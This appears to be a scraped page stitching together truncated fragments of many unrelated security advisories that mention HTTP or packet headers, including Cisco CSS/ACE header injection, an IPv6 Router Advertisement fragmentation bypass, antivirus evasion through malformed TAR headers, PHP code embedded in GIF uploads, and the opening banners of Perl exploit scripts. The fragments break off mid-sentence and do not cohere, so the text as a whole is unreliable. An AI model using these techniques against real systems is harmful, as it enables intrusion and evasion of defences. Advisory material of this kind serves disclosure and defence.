Next Page >>
header
Security Advisory
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Multiple Cisco CSS / ACE Client Certificate and HTTP Header
Manipulation Vulnerabilities
Release Date: 2010-07-02
Application: Cisco Content Services Switch (CSS) / ACE Products
Versions: Cisco CSS 11500 - 08.20.1.01
Cisco ACE 4710 - Version A3(2.5) [build 3.0(0)A3(2.5)
#include <netinet/ip.h>
/* BSD */
#define _BSD
/* Header sizes */
#define IP_HDR_SIZE 20
#define GRE_HDR_SIZE 4
#define GRE_KEY_SIZE 4
#define NHRP_HDR_SIZE 62
Attack:
=======
Make the evil Router Advertisement fragmented and put the ICMPv6 into
the second fragment, eg. by putting a very large Destination extension
header before the ICMPv6 part.
So the packets look like:
Fragment 1:
IPv6 Header
Summary:
A) Prelude to the vulnerabities
B) Cross Site Scripting
C) HTTP Response Header Injection
D) HTTP Response Splitting
A) Prelude to the vulnerabities
What follows is the code used to validate the user input:
current implementation. Microsoft decided to filter "Type 1 XSS" which is
free text send to the server being reflected to the user and therefore
injecting HTML code into the website's page. They chose not to handle
certain situations such as injection into a JavaScript tag space, which
would be extremely difficult to filter. The software giant also chose not
to filter injection into HTTP headers, which will drive hackers to focus on
discovering CRLF vulnerabilities.
A quote of Microsoft's Anti-XSS filter design philosophy:
<<<
"Like all security mitigation and protection technologies, the XSS Filter's
such attacks.
I Introduction
====================================================
Mime or Content Type sniffing[1] is a standard functionality in browsers to find
an appropriate way to render data where the HTTP headers sent by the server are
either inconclusive or missing. Especially the Internet Explorer browser is
known to use this technique even in cases where the server sends a specific
content type header[2].
Internet explorer resorts to mime sniffing when either the
Content-Type header and
TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004
CVE no -
CVE-2012-1456
39. If the length field in the header of a file with test EICAR virus
included into a TAR archive is set to be greater than the archive's total
length (1,000,000+original length in our experiments), the antivirus
declares the file to be clean but virus gets extracted correctly by the
GNU tar program.
response and '300 Multiple Choices' message body.
This could lead to Xss if the name of the file is controlled by an
attacker (i.e. by previously uploading it).
Moreover, as the list of the filenames is also sent, without being
sanitized, in the response header, it could result in a Http Response
Splitting [1] issue if the name of the file contains '\n' (Line Feed).
[ Analysis ]
RFC3173 ip payload compression, henceforth ipcomp, is a protocol intended to
provide compression of ip datagrams, and is commonly used alongside IPSec
(although there is no requirement to do so).
An ipcomp datagram consists of an ip header with ip->ip_p set to 108, followed
by a 32 bit ipcomp header, described in C syntax below.
struct ipcomp {
uint8_t comp_nxt; // Next Header
uint8_t comp_flags; // Reserved
Risk factor: N/A
The reason why we didn't consider this vulnerability a security risk is because the attacker needs to force the victim's browser to submit a malformed HTTP method.
Header injection has been demonstrated to be possible using Flash [1] [2], but might be dependent on vulnerable Flash plugins.
A relevant example published in the past is exploiting the Apache 'Expect' XSS [3] (CVE-2006-3918) using flash [4].
However, in this case we need to spoof the HTTP METHOD to a specially-crafted value.
Besides many other applications the CFNetwork framework is used by
Safari and Mail.
Description:
A remotely exploitable vulnerability has been found in the HTTP header
parsing code. Each HTTP header received from a web server is first
capitalized. I.e. the first character of the header name is upper-cased
while all remaining characters are lower-cased. Inside the CFNetwork
framework the _CFCapitalizeHeader() function is used for this purpose.
* CONTACT: gmdarkfig@gmail.com (french / english)
* GREETZ: Sparah, Ddx39
*
* DESCRIPTION:
* The phpsploit is a class implementing a web user agent.
* You can add cookies, headers, use a proxy server with (or without) a
* basic authentification. It supports the GET and the POST method. It can
* also be used like a browser with the cookiejar() function (which allow
* a server to add several cookies for the next requests) and the
* allowredirection() function (which allow the script to follow all
* redirections sent by the server). It can return the content (or the
- -----/
According to the .MBM format [3], the structure of an MBM is the
following (beginning with a Header Section):
/-----
Offset Size Data Description
0000 ID 37 00 00 10 UID1: Header Section layout
There is possbile get username and password from "Proxy-Authorization" header, which is not correctly removed when authorization header sends WMP.
Requirements:
- IWSVA/IWSS basic authorization on
- Client is using WMP (8-11) as video player
- Standalone proxy (if upstream proxy is used, "Proxy-Authorization" header is removed by this upstream proxy)
Bug:
- ----------------------
Over the last several years, VSR analysts had observed unusual behavior
in multiple WebLogic deployments when certain special characters were
URL encoded and appended to URLs. In late April, 2010 VSR began
researching this more in depth and found that the issue could allow for
HTTP header injection and HTTP request smuggling attacks.
Product Background
- ------------------
WebLogic application server is commonly deployed in a three-tier
+++ lib/webrick/httprequest.rb (working copy)
@@ -267,9 +267,5 @@ module WEBrick
end
end
- begin
- @header = HTTPUtils::parse_header(@raw_header.join)
- rescue => ex
- raise HTTPStatus::BadRequest, ex.message
- end
+ @header = HTTPUtils::parse_header(@raw_header.join)
end
from the data images, handling virtual machines' hard drives and so on.
The first vulnerability - Denial of Service - exists in the FAT image
handling function (mainly diskette image files are able to cause this kind
of application hang, but it's also possible that other image formats'
header modification may lead to such kind of program behaviour).
The succesful DoS attack is achieved by opening a special .IMG
file with its header modified. Because of bad FAT header handling,
the application may get into an infinite loop, so that the
only way is to terminate the process.
=======================
Affects most web application platforms, including Java, .NET, PHP, Cold
Fusion.
This attack involves the use of header injection, particularly the
Content-Disposition header, to subvert HTTP responses from trusted
domains. Attackers can use this technique to inject a malicious file
download with an arbitrary filename (.html, .exe, .swf, .mov, .msi,
.vbs, etc...) and arbitrary file content. Since the attack subverts an
existing HTTP request, both the URL and the downloaded file use a
Permalink:
http://www.mindedsecurity.com/MSA01240108.html
[ Summary ]
Internet Explorer 7 allows setting of header "Transfer Encoding:
chunked" in setRequestHeader exposing the browser to Http Request
Splitting/Smuggling attacks.
[ Analysis ]
remote code execution. However further investigation into the
vulnerability revealed that it can only be triggered if the admin
has not only activated transparent cookie encryption, but also
explicitly disabled several other security features of Suhosin.
In addition to that remote exploitation requires a PHP application
that puts unfiltered user input into a call to the header()
function that sends a Set-Cookie header.
Furthermore most modern unix systems compile the Suhosin extension
with the FORTIFY_SOURCE flag, which will detect the possible buffer
overflow and abort execution before something bad can happen.
The version of an HTTP message is indicated by an HTTP-Version field
in the first line of the message.
HTTP-Version = "HTTP" "/" 1*DIGIT "." 1*DIGIT
HTTP/1.1 header field values can be folded onto multiple lines if the
continuation line begins with a space or horizontal tab. All linear
white space, including folding, has the same semantics as SP. A
recipient MAY replace any linear white space with a single SP before
interpreting the field value or forwarding the message downstream.
I want to warn you about Cross-Site Scripting vulnerability in Mozilla,
Firefox and Chrome.
Some time ago Mozilla fixed vulnerability in Firefox described in MFSA
2009-22 (http://www.mozilla.org/security/announce/2009/mfsa2009-22.html).
Which allowed Refresh header to redirect to javascript: URIs.
This vulnerability was fixed in Firefox 3.0.9. And recently, 06.07.2009, I
found possibility to bypass this protection in Firefox. Also this method of
XSS attacks works in Mozilla (1.7.x) and Chrome.
netVigilance Security Advisory #68
SimpNews version 2.41.03 Multiple Path Disclosure Vulnerabilities
Description:
SimpNews is a news system written in PHP. Features: Data stored in MySQL, admin interface, support for multiple languages, support for multiple instances in one database, own header, multiple layout settings, support for BBCode andsmilies, you can assin an icon graphic to every news entry, you can attach a file to news entries, entries can be put in categories, users can subscribe to get news sent by email, search entries, users can post comments on news entries, event calendar, newsticker, option to let users propose news entries.
External References:
Mitre CVE: CVE-2007-4872
NVD NIST: CVE-2007-4872
OSVDB: ID requested but no answer received
// continue on as this is okay
}
elseif (( false === isset( $_COOKIE[$gFolderName] )) ||
( $theChecksum !== $_COOKIE[$gFolderName] ))
{
header( "Location: /mailbox/pin.php?" . NAME_KEY .
"=" . $gFolderName ); exit;
}
Vulnerability 2: Authentication not validated
Advisory: Papoo CMS: Authenticated Arbitrary Code Execution
The Papoo CMS allows authenticated users to upload GIF, JPG and PNG images
if they have the "upload images" privilege, which is true for all default
groups that can access the administrative interface. The CMS checks the
uploaded images only for their header, but not for the file extension. It
is therefore possible to upload images with the file extension ".php" and
a valid image header. By embedding PHP code into the image (e.g. by using
the GIF comments field), arbitrary code can be executed when requesting
the image.
or ASSIGNED by using the XML-RPC interface.
* When viewing several bugs at once, there was a Cross-Site Scripting hole.
* The inbound email interface allowed you to set the Reporter via the
text of the email, instead of just using the From header.
All affected installations are encouraged to upgrade as soon as possible.
Vulnerability Details
=====================
use Getopt::Long;
sub header
{
print "
****************************************************
* Easyecards 310a Exploit *
****************************************************
.- file /usr/share/spamassassin/72_active.cf
replace :
header FH_DATE_PAST_20XX Date =~ /20[1-9][0-9]/ [if-unset: 2006]
by:
header FH_DATE_PAST_20XX Date =~ /20[2-9][0-9]/ [if-unset: 2006]
use Getopt::Long;
sub header
{
print "
****************************************************
* Easydynamicpages 30tr Exploit *
****************************************************
'''
File/Function/line : webserver.c/ws_decodepassword/1399
Cause: Null pointer dereference. There is an unchecked increment of
the 'header' variable until a space character is encountered. If a
space character is not encountered the pointer is
incremented/dereferenced until out of bounds memory is hit. Exploiting
this depends on the state of memory at the time so the exploit
constantly sends a header with no data as part of the authorization
header until a crash occurs. This typically occurs within seconds.
Next Page>>
|
